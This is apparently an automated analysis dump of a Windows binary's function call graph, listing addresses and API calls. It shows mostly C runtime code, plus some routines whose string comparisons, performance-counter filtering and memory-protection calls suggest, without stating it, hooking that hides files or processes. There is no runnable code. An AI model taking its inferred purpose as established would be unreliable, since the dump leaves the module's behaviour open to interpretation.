1b44490bd73 8405->8407 8406 1b44490be6d 8408 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8406->8408 8407->8377 8408->8407 8409 1b44490d220 _invalid_parameter_noinfo 13 API calls 8409->8416 8410 1b44490be92 8429 1b44490bebc 8410->8429 8414 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8414->8404 8415 1b44490bea6 8417 1b44490d06c _invalid_parameter_noinfo 17 API calls 8415->8417 8416->8404 8416->8406 8416->8409 8416->8410 8416->8415 8418 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8416->8418 8420 1b44490c328 8416->8420 8419 1b44490beb9 8417->8419 8418->8416 8421 1b44490c335 8420->8421 8422 1b44490c33f 8420->8422 8421->8422 8426 1b44490c35a 8421->8426 8423 1b44490d1f4 __std_exception_copy 13 API calls 8422->8423 8428 1b44490c346 8423->8428 8424 1b44490c352 8424->8416 8425 1b44490d04c _invalid_parameter_noinfo 38 API calls 8425->8424 8426->8424 8427 1b44490d1f4 __std_exception_copy 13 API calls 8426->8427 8427->8428 8428->8425 8430 1b44490be9a 8429->8430 8431 1b44490bec1 8429->8431 8430->8414 8432 1b44490beea 8431->8432 8433 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8431->8433 8434 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8432->8434 8433->8431 8434->8430 8636 1b444902ab4 TlsGetValue TlsGetValue TlsGetValue 8637 1b444902b0d 8636->8637 8642 1b444902b79 8636->8642 8639 1b444902b15 8637->8639 8637->8642 8638 1b444902b74 8639->8638 8640 1b444902c32 TlsSetValue TlsSetValue TlsSetValue 8639->8640 8641 1b444903f88 StrCmpNIW 8639->8641 8640->8638 8641->8639 8642->8638 8642->8640 8643 1b444903f88 StrCmpNIW 8642->8643 8643->8642 8644 1b4449034b8 8645 1b4449034e8 8644->8645 8646 1b4449035a1 8645->8646 8647 1b444903505 PdhGetCounterInfoW 8645->8647 8647->8646 8648 1b444903523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8647->8648 8649 1b444903555 StrCmpW 8648->8649 8650 1b44490358d GetProcessHeap HeapFree 8648->8650 8649->8650 8652 1b44490356a 8649->8652 8650->8646 8651 1b444903950 12 API calls 8651->8652 8652->8650 8652->8651 7559 1b444901e3c LoadLibraryA GetProcAddress 7560 1b444901e6f 7559->7560 7561 1b444901e62 SleepEx 7559->7561 7561->7561 7878 1b4449081c0 7879 1b4449081c9 __scrt_release_startup_lock 7878->7879 7881 1b4449081cd 7879->7881 7882 1b44490bbb4 7879->7882 7883 1b44490bbd4 7882->7883 7884 1b44490bbed 7882->7884 7885 1b44490bbdc 7883->7885 7886 1b44490bbf2 7883->7886 7884->7881 7888 1b44490d1f4 __std_exception_copy 13 API calls 7885->7888 7887 1b44490e864 56 API calls 7886->7887 7889 1b44490bbf7 7887->7889 7890 1b44490bbe1 7888->7890 7914 1b44490df38 GetModuleFileNameW 7889->7914 7911 1b44490d04c 7890->7911 7898 1b44490bc69 7901 1b44490d1f4 __std_exception_copy 13 API calls 7898->7901 7899 1b44490bc7a 7900 1b44490b994 14 API calls 7899->7900 7903 1b44490bc96 7900->7903 7910 1b44490bc6e 7901->7910 7902 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7902->7884 7904 1b44490bcc6 7903->7904 7905 1b44490bcdf 7903->7905 7903->7910 7906 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7904->7906 7908 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7905->7908 7907 1b44490bccf 7906->7907 7909 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7907->7909 7908->7910 7909->7884 7910->7902 7938 1b44490cef8 7911->7938 7915 1b44490df7d GetLastError 7914->7915 7916 1b44490df91 7914->7916 8003 1b44490d184 7915->8003 7918 1b44490dd78 14 API calls 7916->7918 7920 1b44490dfbf 7918->7920 7919 1b44490df8a 7921 1b444908070 _invalid_parameter_noinfo 8 API calls 7919->7921 7925 1b44490dfd0 7920->7925 8008 1b44490f198 7920->8008 7924 1b44490bc0e 7921->7924 7926 1b44490b994 7924->7926 8012 1b44490de1c 7925->8012 7928 1b44490b9d2 7926->7928 7930 1b44490ba38 7928->7930 8029 1b44490ec1c 7928->8029 7929 1b44490bb25 7932 1b44490bb54 7929->7932 7930->7929 7931 1b44490ec1c 14 API calls 7930->7931 7931->7930 7933 1b44490bb6c 7932->7933 7937 1b44490bba4 7932->7937 7934 1b44490d220 _invalid_parameter_noinfo 13 API calls 7933->7934 7933->7937 7935 1b44490bb9a 7934->7935 7936 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7935->7936 7936->7937 7937->7898 7937->7899 7939 1b44490cf23 7938->7939 7946 1b44490cf94 7939->7946 7941 1b44490cf4a 7942 1b44490cf6d 7941->7942 7956 1b44490c3e0 7941->7956 7944 1b44490cf82 7942->7944 7945 1b44490c3e0 _invalid_parameter_noinfo 17 API calls 7942->7945 7944->7884 7945->7944 7969 1b44490ccc8 7946->7969 7951 1b44490cfcf 7951->7941 7957 1b44490c438 7956->7957 7958 1b44490c3ef GetLastError 7956->7958 7957->7942 7959 1b44490c404 7958->7959 7960 1b44490cba0 _invalid_parameter_noinfo 14 API calls 7959->7960 7961 1b44490c41e SetLastError 7960->7961 7961->7957 7962 1b44490c441 7961->7962 7963 1b44490c3e0 _invalid_parameter_noinfo 15 API calls 7962->7963 7964 1b44490c467 7963->7964 7995 1b44490ffe8 7964->7995 7970 1b44490cce4 GetLastError 7969->7970 7971 1b44490cd1f 7969->7971 7972 1b44490ccf4 7970->7972 7971->7951 7975 1b44490cd34 7971->7975 7982 1b44490cba0 7972->7982 7976 1b44490cd68 7975->7976 7977 1b44490cd50 GetLastError SetLastError 7975->7977 7976->7951 7978 1b44490d06c IsProcessorFeaturePresent 7976->7978 7977->7976 7979 1b44490d07f 7978->7979 7987 1b44490cd80 7979->7987 7983 1b44490cbc8 FlsGetValue 7982->7983 7985 1b44490cbc4 7982->7985 7983->7985 7984 1b44490cbde SetLastError 7984->7971 7985->7984 7986 1b44490c940 _invalid_parameter_noinfo 13 API calls 7985->7986 7986->7984 7988 1b44490cdba _invalid_parameter_noinfo 7987->7988 7989 1b44490cde2 RtlCaptureContext RtlLookupFunctionEntry 7988->7989 7990 1b44490ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7989->7990 7991 1b44490ce2e RtlVirtualUnwind 7989->7991 7992 1b44490ceb6 _invalid_parameter_noinfo 7990->7992 7991->7990 7993 1b444908070 _invalid_parameter_noinfo 8 API calls 7992->7993 7994 1b44490ced5 GetCurrentProcess TerminateProcess 7993->7994 7996 1b44490c48f 7995->7996 7997 1b444910001 7995->7997 7999 1b444910054 7996->7999 7997->7996 7998 1b444910a40 _invalid_parameter_noinfo 14 API calls 7997->7998 7998->7996 8000 1b44491006d 7999->8000 8001 1b44490c49f 7999->8001 8000->8001 8002 1b44490e8c4 _invalid_parameter_noinfo 14 API calls 8000->8002 8001->7942 8002->8001 8026 1b44490d1d0 8003->8026 8005 1b44490d191 Concurrency::details::SchedulerProxy::DeleteThis 8006 1b44490d1f4 __std_exception_copy 13 API calls 8005->8006 8007 1b44490d1a1 8006->8007 8007->7919 8009 1b44490f1a9 8008->8009 8010 1b44490f1ca 8008->8010 8009->8010 8011 1b44490ef88 9 API calls 8009->8011 8010->7925 8011->8010 8013 1b44490de5b 8012->8013 8015 1b44490de40 8012->8015 8014 1b44490de60 8013->8014 8016 1b44490ece8 WideCharToMultiByte 8013->8016 8014->8015 8019 1b44490d1f4 __std_exception_copy 13 API calls 8014->8019 8015->7919 8017 1b44490deb7 8016->8017 8017->8014 8018 1b44490debe GetLastError 8017->8018 8021 1b44490dee9 8017->8021 8020 1b44490d184 13 API calls 8018->8020 8019->8015 8022 1b44490decb 8020->8022 8023 1b44490ece8 WideCharToMultiByte 8021->8023 8024 1b44490d1f4 __std_exception_copy 13 API calls 8022->8024 8025 1b44490df10 8023->8025 8024->8015 8025->8015 8025->8018 8027 1b44490cb10 __std_exception_copy 13 API calls 8026->8027 8028 1b44490d1d9 8027->8028 8028->8005 8030 1b44490eba8 8029->8030 8031 1b44490dd78 14 API calls 8030->8031 8032 1b44490ebcc 8031->8032 8032->7928 8435 1b44490ff40 8436 1b44490ff4b 8435->8436 8444 1b444912c24 8436->8444 8457 1b44490c558 EnterCriticalSection 8444->8457 8803 1b44490f440 GetProcessHeap 8804 1b44490ae42 8805 1b444909324 _CreateFrameInfo 9 API calls 8804->8805 8807 1b44490ae4f __CxxCallCatchBlock 8805->8807 8806 1b44490ae93 RaiseException 8808 1b44490aeba 8806->8808 8807->8806 8809 1b444909978 __CxxCallCatchBlock 9 API calls 8808->8809 8814 1b44490aec2 8809->8814 8810 1b44490aeeb __CxxCallCatchBlock 8811 1b444909324 _CreateFrameInfo 9 API calls 8810->8811 8812 1b44490aefe 8811->8812 8813 1b444909324 _CreateFrameInfo 9 API calls 8812->8813 8815 1b44490af07 8813->8815 8814->8810 8816 1b444908ff8 __CxxCallCatchBlock 9 API calls 8814->8816 8816->8810 8033 1b4449147c2 8042 1b444909978 8033->8042 8037 1b444914828 8038 1b444909324 _CreateFrameInfo 9 API calls 8037->8038 8039 1b444914838 8038->8039 8041 1b444914814 __CxxCallCatchBlock 8053 1b444909324 8041->8053 8043 1b444909324 _CreateFrameInfo 9 API calls 8042->8043 8044 1b44490998a 8043->8044 8045 1b4449099c5 8044->8045 8046 1b444909324 _CreateFrameInfo 9 API calls 8044->8046 8047 1b444909995 8046->8047 8047->8045 8048 1b444909324 _CreateFrameInfo 9 API calls 8047->8048 8049 1b4449099b6 8048->8049 8049->8041 8050 1b444908ff8 8049->8050 8051 1b444909324 _CreateFrameInfo 9 API calls 8050->8051 8052 1b444909006 8051->8052 8052->8041 8056 1b444909340 8053->8056 8055 1b44490932d 8055->8037 8057 1b444909358 8056->8057 8058 1b44490935f GetLastError 8056->8058 8057->8055 8068 1b444909c8c 8058->8068 8072 1b444909aac 8068->8072 8073 1b444909b96 TlsGetValue 8072->8073 8079 1b444909af0 __vcrt_InitializeCriticalSectionEx 8072->8079 8074 1b444909b1e LoadLibraryExW 8076 1b444909bbd 8074->8076 8077 1b444909b3f GetLastError 8074->8077 8075 1b444909bdd GetProcAddress 8075->8073 8076->8075 8078 1b444909bd4 FreeLibrary 8076->8078 8077->8079 8078->8075 8079->8073 8079->8074 8079->8075 8080 1b444909b61 LoadLibraryExW 8079->8080 8080->8076 8080->8079 8081 1b44490f3e4 8082 1b44490f41d 8081->8082 8083 1b44490f3ee 8081->8083 8083->8082 8084 1b44490f403 FreeLibrary 8083->8084 8084->8083 8085 1b4449133e4 8086 1b4449133f5 CloseHandle 8085->8086 8087 1b4449133fb 8085->8087 8086->8087 8088 1b4449027e8 8089 1b444902867 8088->8089 8090 1b4449028c9 GetFileType 8089->8090 8102 1b444902998 8089->8102 8091 1b4449028d7 StrCpyW 8090->8091 8092 1b4449028ed 8090->8092 8093 1b4449028fc 8091->8093 8104 1b444901ad4 GetFinalPathNameByHandleW 8092->8104 8097 1b44490299d 8093->8097 8101 1b444902906 8093->8101 8095 1b444903f88 StrCmpNIW 8095->8097 8097->8095 8098 1b444903708 4 API calls 8097->8098 8099 1b444901dd4 2 API calls 8097->8099 8097->8102 8098->8097 8099->8097 8101->8102 8109 1b444903f88 8101->8109 8112 1b444903708 StrCmpIW 8101->8112 8116 1b444901dd4 8101->8116 8105 1b444901b3d 8104->8105 8106 1b444901afe StrCmpNIW 8104->8106 8105->8093 8106->8105 8107 1b444901b18 lstrlenW 8106->8107 8107->8105 8108 1b444901b2a StrCpyW 8107->8108 8108->8105 8110 1b444903f95 StrCmpNIW 8109->8110 8111 1b444903faa 8109->8111 8110->8111 8111->8101 8113 1b44490373a StrCpyW StrCatW 8112->8113 8114 1b444903751 PathCombineW 8112->8114 8115 1b44490375a 8113->8115 8114->8115 8115->8101 8117 1b444901deb 8116->8117 8118 1b444901df4 8116->8118 8119 1b444901530 2 API calls 8117->8119 8118->8101 8119->8118 8120 1b44490b7ea 8132 1b44490c2f4 8120->8132 8133 1b44490cab0 _invalid_parameter_noinfo 14 API calls 8132->8133 8134 1b44490c2fd 8133->8134 8135 1b444902ff0 8136 1b444903061 8135->8136 8137 1b444903384 8136->8137 8138 1b44490308d GetModuleHandleA 8136->8138 8139 1b44490309f GetProcAddress 8138->8139 8140 1b4449030b1 8138->8140 8139->8140 8140->8137 8141 1b4449030d8 StrCmpNIW 8140->8141 8141->8137 8142 1b4449030fd 8141->8142 8142->8137 8143 1b444901a30 6 API calls 8142->8143 8144 1b4449032b9 lstrlenW 8142->8144 8145 1b44490320f lstrlenW 8142->8145 8146 1b444903f88 StrCmpNIW 8142->8146 8147 1b444901cfc StrCmpIW StrCmpW 8142->8147 8143->8142 8144->8142 8145->8142 8146->8142 8147->8142 8467 1b44490f370 VirtualProtect 8817 1b44490f870 8818 1b44490f8a0 8817->8818 8820 1b44490f8c7 8817->8820 8819 1b44490cb10 __std_exception_copy 13 API calls 8818->8819 8818->8820 8824 1b44490f8b4 8818->8824 8819->8824 8821 1b44490f99c 8820->8821 8840 1b44490c558 EnterCriticalSection 8820->8840 8825 1b44490fab3 8821->8825 8827 1b44490fa03 8821->8827 8833 1b44490f9ca 8821->8833 8823 1b44490f904 8824->8820 8824->8823 8826 1b44490f949 8824->8826 8828 1b44490fac0 8825->8828 8842 1b44490c5ac LeaveCriticalSection 8825->8842 8829 1b44490d1f4 __std_exception_copy 13 API calls 8826->8829 8838 1b44490fa61 8827->8838 8841 1b44490c5ac LeaveCriticalSection 8827->8841 8832 1b44490f94e 8829->8832 8834 1b44490d04c _invalid_parameter_noinfo 38 API calls 8832->8834 8833->8827 8835 1b44490cab0 _invalid_parameter_noinfo 14 API calls 8833->8835 8834->8823 8837 1b44490f9f3 8835->8837 8836 1b44490cab0 14 API calls _invalid_parameter_noinfo 8836->8838 8839 1b44490cab0 _invalid_parameter_noinfo 14 API calls 8837->8839 8838->8836 8839->8827 8843 1b444908672 8844 1b4449090c0 __std_exception_copy 38 API calls 8843->8844 8845 1b44490869d 8844->8845 8656 1b44490b0d4 8663 1b44490b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8656->8663 8657 1b44490b0fb 8658 1b444909324 _CreateFrameInfo 9 API calls 8657->8658 8659 1b44490b100 8658->8659 8660 1b444909324 _CreateFrameInfo 9 API calls 8659->8660 8661 1b44490b10b __FrameHandler3::GetHandlerSearchState 8659->8661 8660->8661 8662 1b4449099cc 9 API calls Is_bad_exception_allowed 8662->8663 8663->8657 8663->8661 8663->8662 8665 1b4449099f4 8663->8665 8666 1b444909324 _CreateFrameInfo 9 API calls 8665->8666 8667 1b444909a02 8666->8667 8667->8663 8846 1b444902e54 8848 1b444902ea8 8846->8848 8847 1b444902ec3 8848->8847 8850 1b4449037f4 8848->8850 8851 1b44490388a 8850->8851 8853 1b444903819 8850->8853 8851->8847 8852 1b444903f88 StrCmpNIW 8852->8853 8853->8851 8853->8852 8854 1b444901e08 StrCmpIW StrCmpW 8853->8854 8854->8853 8148 1b44490c1d8 8149 1b44490c209 8148->8149 8150 1b44490c1f1 8148->8150 8150->8149 8151 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8150->8151 8151->8149 8668 1b444902ed8 8670 1b444902f35 8668->8670 8669 1b444902f50 8670->8669 8671 1b4449038a8 3 API calls 8670->8671 8671->8669 8855 1b44490d658 8856 1b44490d67d 8855->8856 8861 1b44490d694 8855->8861 8857 1b44490d1f4 __std_exception_copy 13 API calls 8856->8857 8858 1b44490d682 8857->8858 8860 1b44490d04c _invalid_parameter_noinfo 38 API calls 8858->8860 8859 1b44490d724 8862 1b44490bb54 13 API calls 8859->8862 8883 1b44490d68d 8860->8883 8861->8859 8879 1b44490d7b6 8861->8879 8881 1b44490d6da 8861->8881 8888 1b44490d894 8861->8888 8950 1b44490da18 8861->8950 8863 1b44490d77c 8862->8863 8865 1b44490d784 8863->8865 8884 1b44490d7d7 8863->8884 8868 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8865->8868 8867 1b44490d836 8869 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8867->8869 8871 1b44490d78b 8868->8871 8872 1b44490d841 8869->8872 8870 1b44490d6fd 8877 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8870->8877 8871->8870 8876 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8871->8876 8873 1b44490d85a 8872->8873 8878 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8872->8878 8880 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8873->8880 8874 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8874->8879 8875 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8875->8881 8876->8871 8877->8883 8878->8872 8879->8870 8879->8874 8880->8883 8881->8870 8881->8875 8884->8867 8885 1b44490d87c 8884->8885 8987 1b444910eb8 8884->8987 8886 1b44490d06c _invalid_parameter_noinfo 17 API calls 8885->8886 8887 1b44490d891 8886->8887 8889 1b44490d8c2 8888->8889 8889->8889 8890 1b44490d8de 8889->8890 8891 1b44490d220 _invalid_parameter_noinfo 13 API calls 8889->8891 8890->8861 8892 1b44490d90d 8891->8892 8893 1b44490d926 8892->8893 8894 1b444910eb8 38 API calls 8892->8894 8895 1b444910eb8 38 API calls 8893->8895 8897 1b44490d9fc 8893->8897 8894->8893 8896 1b44490d943 8895->8896 8896->8897 8898 1b44490d97f 8896->8898 8900 1b44490d98d 8896->8900 8901 1b44490d962 8896->8901 8899 1b44490d06c _invalid_parameter_noinfo 17 API calls 8897->8899 8903 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8898->8903 8911 1b44490da17 8899->8911 8904 1b44490d977 8900->8904 8996 1b44490eee0 8900->8996 8902 1b44490d220 _invalid_parameter_noinfo 13 API calls 8901->8902 8906 1b44490d96d 8902->8906 8903->8897 8904->8898 8905 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8904->8905 8905->8898 8909 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906->8909 8908 1b44490da7a 8913 1b44490da8c 8908->8913 8920 1b44490daa1 8908->8920 8909->8904 8910 1b44490d9b5 8914 1b44490d9ba 8910->8914 8915 1b44490d9d0 8910->8915 8911->8908 9005 1b4449113d8 8911->9005 8917 1b44490d894 52 API calls 8913->8917 8918 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8914->8918 8916 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8915->8916 8916->8898 8919 1b44490da9c 8917->8919 8918->8904 8921 1b444908070 _invalid_parameter_noinfo 8 API calls 8919->8921 8922 1b44490dd78 14 API calls 8920->8922 8923 1b44490dd64 8921->8923 8924 1b44490db0b 8922->8924 8923->8861 8925 1b44490f198 9 API calls 8924->8925 8926 1b44490db1a 8924->8926 8925->8926 9014 1b44490d30c 8926->9014 8929 1b44490dba8 8930 1b44490d894 52 API calls 8929->8930 8931 1b44490dbb8 8930->8931 8931->8919 8933 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8931->8933 8932 1b44490dd78 14 API calls 8938 1b44490dbd2 8932->8938 8933->8919 8934 1b44490f198 9 API calls 8934->8938 8936 1b44490d894 52 API calls 8936->8938 8937 1b44490dcc8 FindNextFileW 8937->8938 8941 1b44490dce0 8937->8941 8938->8932 8938->8934 8938->8936 8938->8937 8939 1b44490d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8938->8939 8940 1b44490dd2a 8938->8940 9036 1b44490d4ac 8938->9036 8939->8938 8942 1b44490dd38 FindClose 8940->8942 8945 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8940->8945 8943 1b44490dd0c FindClose 8941->8943 9058 1b444910b20 8941->9058 8942->8919 8946 1b44490dd48 8942->8946 8943->8919 8944 1b44490dd1c 8943->8944 8948 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8944->8948 8945->8942 8949 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8946->8949 8948->8919 8949->8919 8951 1b44490da58 8950->8951 8952 1b44490da7a 8950->8952 8951->8952 8953 1b4449113d8 38 API calls 8951->8953 8954 1b44490da8c 8952->8954 8956 1b44490daa1 8952->8956 8953->8951 8955 1b44490d894 56 API calls 8954->8955 8980 1b44490da9c 8955->8980 8958 1b44490dd78 14 API calls 8956->8958 8957 1b444908070 _invalid_parameter_noinfo 8 API calls 8959 1b44490dd64 8957->8959 8960 1b44490db0b 8958->8960 8959->8861 8961 1b44490db1a 8960->8961 8962 1b44490f198 9 API calls 8960->8962 8963 1b44490d30c 16 API calls 8961->8963 8962->8961 8964 1b44490db7b FindFirstFileExW 8963->8964 8965 1b44490dba8 8964->8965 8971 1b44490dbd2 8964->8971 8966 1b44490d894 56 API calls 8965->8966 8967 1b44490dbb8 8966->8967 8969 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8967->8969 8967->8980 8968 1b44490dd78 14 API calls 8968->8971 8969->8980 8970 1b44490f198 9 API calls 8970->8971 8971->8968 8971->8970 8972 1b44490d4ac 16 API calls 8971->8972 8973 1b44490d894 56 API calls 8971->8973 8974 1b44490dcc8 FindNextFileW 8971->8974 8975 1b44490d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8971->8975 8978 1b44490dd2a 8971->8978 8972->8971 8973->8971 8974->8971 8976 1b44490dce0 8974->8976 8975->8971 8979 1b44490dd0c FindClose 8976->8979 8984 1b444910b20 38 API calls 8976->8984 8977 1b44490dd38 FindClose 8977->8980 8983 1b44490dd48 8977->8983 8978->8977 8982 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8978->8982 8979->8980 8981 1b44490dd1c 8979->8981 8980->8957 8985 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8981->8985 8982->8977 8986 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8983->8986 8984->8979 8985->8980 8986->8980 8988 1b444910ed5 8987->8988 8990 1b444910ef0 8988->8990 8992 1b444910eda 8988->8992 8994 1b444910f24 8988->8994 8989 1b44490d1f4 __std_exception_copy 13 API calls 8991 1b444910ee4 8989->8991 8990->8884 8993 1b44490d04c _invalid_parameter_noinfo 38 API calls 8991->8993 8992->8989 8992->8990 8993->8990 8994->8990 8995 1b44490d1f4 __std_exception_copy 13 API calls 8994->8995 8995->8991 8997 1b44490ef1f 8996->8997 8998 1b44490ef02 8996->8998 9000 1b44490ef29 8997->9000 9066 1b4449119f0 8997->9066 8998->8997 8999 1b44490ef10 8998->8999 9001 1b44490d1f4 __std_exception_copy 13 API calls 8999->9001 9073 1b444911a40 9000->9073 9004 1b44490ef15 9001->9004 9004->8910 9006 1b4449113e0 9005->9006 9007 1b4449113f5 9006->9007 9009 1b44491140e 9006->9009 9008 1b44490d1f4 __std_exception_copy 13 API calls 9007->9008 9010 1b4449113fa 9008->9010 9011 1b444911405 9009->9011 9013 1b44490dd78 14 API calls 9009->9013 9012 1b44490d04c _invalid_parameter_noinfo 38 API calls 9010->9012 9011->8911 9012->9011 9013->9011 9015 1b44490d336 9014->9015 9016 1b44490d35a 9014->9016 9019 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9015->9019 9023 1b44490d345 FindFirstFileExW 9015->9023 9017 1b44490d3bf 9016->9017 9018 1b44490d35f 9016->9018 9020 1b44490ec58 MultiByteToWideChar 9017->9020 9021 1b44490d374 9018->9021 9018->9023 9024 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9018->9024 9019->9023 9031 1b44490d3db 9020->9031 9025 1b44490c5d0 14 API calls 9021->9025 9022 1b44490d3e2 GetLastError 9026 1b44490d184 13 API calls 9022->9026 9023->8929 9023->8938 9024->9021 9025->9023 9029 1b44490d3ef 9026->9029 9027 1b44490d420 9027->9023 9028 1b44490ec58 MultiByteToWideChar 9027->9028 9033 1b44490d47a 9028->9033 9034 1b44490d1f4 __std_exception_copy 13 API calls 9029->9034 9030 1b44490d413 9032 1b44490c5d0 14 API calls 9030->9032 9031->9022 9031->9027 9031->9030 9035 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9031->9035 9032->9027 9033->9022 9033->9023 9034->9023 9035->9030 9037 1b44490d4d6 9036->9037 9038 1b44490d4fa 9036->9038 9041 1b44490d4e5 9037->9041 9043 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9037->9043 9039 1b44490d55f 9038->9039 9040 1b44490d500 9038->9040 9042 1b44490ece8 WideCharToMultiByte 9039->9042 9040->9041 9044 1b44490d515 9040->9044 9046 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9040->9046 9041->8938 9050 1b44490d583 9042->9050 9043->9041 9047 1b44490c5d0 14 API calls 9044->9047 9045 1b44490d58a GetLastError 9048 1b44490d184 13 API calls 9045->9048 9046->9044 9047->9041 9049 1b44490d597 9048->9049 9053 1b44490d1f4 __std_exception_copy 13 API calls 9049->9053 9050->9045 9054 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9050->9054 9056 1b44490d5bb 9050->9056 9057 1b44490d5c7 9050->9057 9051 1b44490ece8 WideCharToMultiByte 9052 1b44490d629 9051->9052 9052->9041 9052->9045 9053->9041 9054->9056 9055 1b44490c5d0 14 API calls 9055->9057 9056->9055 9057->9041 9057->9051 9059 1b444910b52 9058->9059 9060 1b444910b67 9059->9060 9061 1b44490d1f4 __std_exception_copy 13 API calls 9059->9061 9064 1b444908070 _invalid_parameter_noinfo 8 API calls 9060->9064 9062 1b444910b5c 9061->9062 9063 1b44490d04c _invalid_parameter_noinfo 38 API calls 9062->9063 9063->9060 9065 1b444910ea8 9064->9065 9065->8943 9067 1b4449119f9 9066->9067 9068 1b444911a12 HeapSize 9066->9068 9069 1b44490d1f4 __std_exception_copy 13 API calls 9067->9069 9070 1b4449119fe 9069->9070 9071 1b44490d04c _invalid_parameter_noinfo 38 API calls 9070->9071 9072 1b444911a09 9071->9072 9072->9000 9074 1b444911a55 9073->9074 9075 1b444911a5f 9073->9075 9076 1b44490c5d0 14 API calls 9074->9076 9077 1b444911a64 9075->9077 9083 1b444911a6b _invalid_parameter_noinfo 9075->9083 9082 1b444911a5d 9076->9082 9078 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9077->9078 9078->9082 9079 1b444911a9e HeapReAlloc 9079->9082 9079->9083 9080 1b444911a71 9081 1b44490d1f4 __std_exception_copy 13 API calls 9080->9081 9081->9082 9082->9004 9083->9079 9083->9080 9084 1b44490b470 _invalid_parameter_noinfo 2 API calls 9083->9084 9084->9083 8152 1b4449025dc 8153 1b44490265a 8152->8153 8154 1b4449026bf GetFileType 8153->8154 8161 1b444902777 8153->8161 8155 1b4449026cd StrCpyW 8154->8155 8156 1b4449026e1 8154->8156 8158 1b4449026ee 8155->8158 8157 1b444901ad4 4 API calls 8156->8157 8157->8158 8159 1b444903f88 StrCmpNIW 8158->8159 8160 1b444903708 4 API calls 8158->8160 8158->8161 8162 1b444901dd4 2 API calls 8158->8162 8159->8158 8160->8158 8162->8158 8672 1b44490f6dc 8673 1b44490f6e8 8672->8673 8675 1b44490f70f 8673->8675 8676 1b444911c0c 8673->8676 8677 1b444911c4c 8676->8677 8678 1b444911c11 8676->8678 8677->8673 8679 1b444911c44 8678->8679 8680 1b444911c32 DeleteCriticalSection 8678->8680 8681 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8679->8681 8680->8679 8680->8680 8681->8677 9085 1b44491465f 9086 1b4449146e2 9085->9086 9087 1b444914677 9085->9087 9087->9086 9088 1b444909324 _CreateFrameInfo 9 API calls 9087->9088 9089 1b4449146c4 9088->9089 9090 1b444909324 _CreateFrameInfo 9 API calls 9089->9090 9091 1b4449146d9 9090->9091 9092 1b44490c2f4 14 API calls 9091->9092 9092->9086 9093 1b44491485e 9094 1b444909324 _CreateFrameInfo 9 API calls 9093->9094 9095 1b44491486c 9094->9095 9096 1b444909324 _CreateFrameInfo 9 API calls 9095->9096 9097 1b444914877 9095->9097 9096->9097 8468 1b444907f60 8469 1b444907f7c 8468->8469 8470 1b444907f81 8468->8470 8472 1b444908090 8469->8472 8473 1b444908127 8472->8473 8474 1b4449080b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8472->8474 8473->8470 8474->8473 8475 1b444913960 8485 1b444908ca0 8475->8485 8477 1b444913988 8479 1b444909324 _CreateFrameInfo 9 API calls 8480 1b444913998 8479->8480 8481 1b444909324 _CreateFrameInfo 9 API calls 8480->8481 8482 1b4449139a1 8481->8482 8483 1b44490c2f4 14 API calls 8482->8483 8484 1b4449139aa 8483->8484 8488 1b444908cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8485->8488 8486 1b444908dd1 8486->8477 8486->8479 8487 1b444908d94 RtlUnwindEx 8487->8488 8488->8486 8488->8487 8682 1b4449106e0 8683 1b4449106e9 8682->8683 8685 1b4449106f9 8682->8685 8684 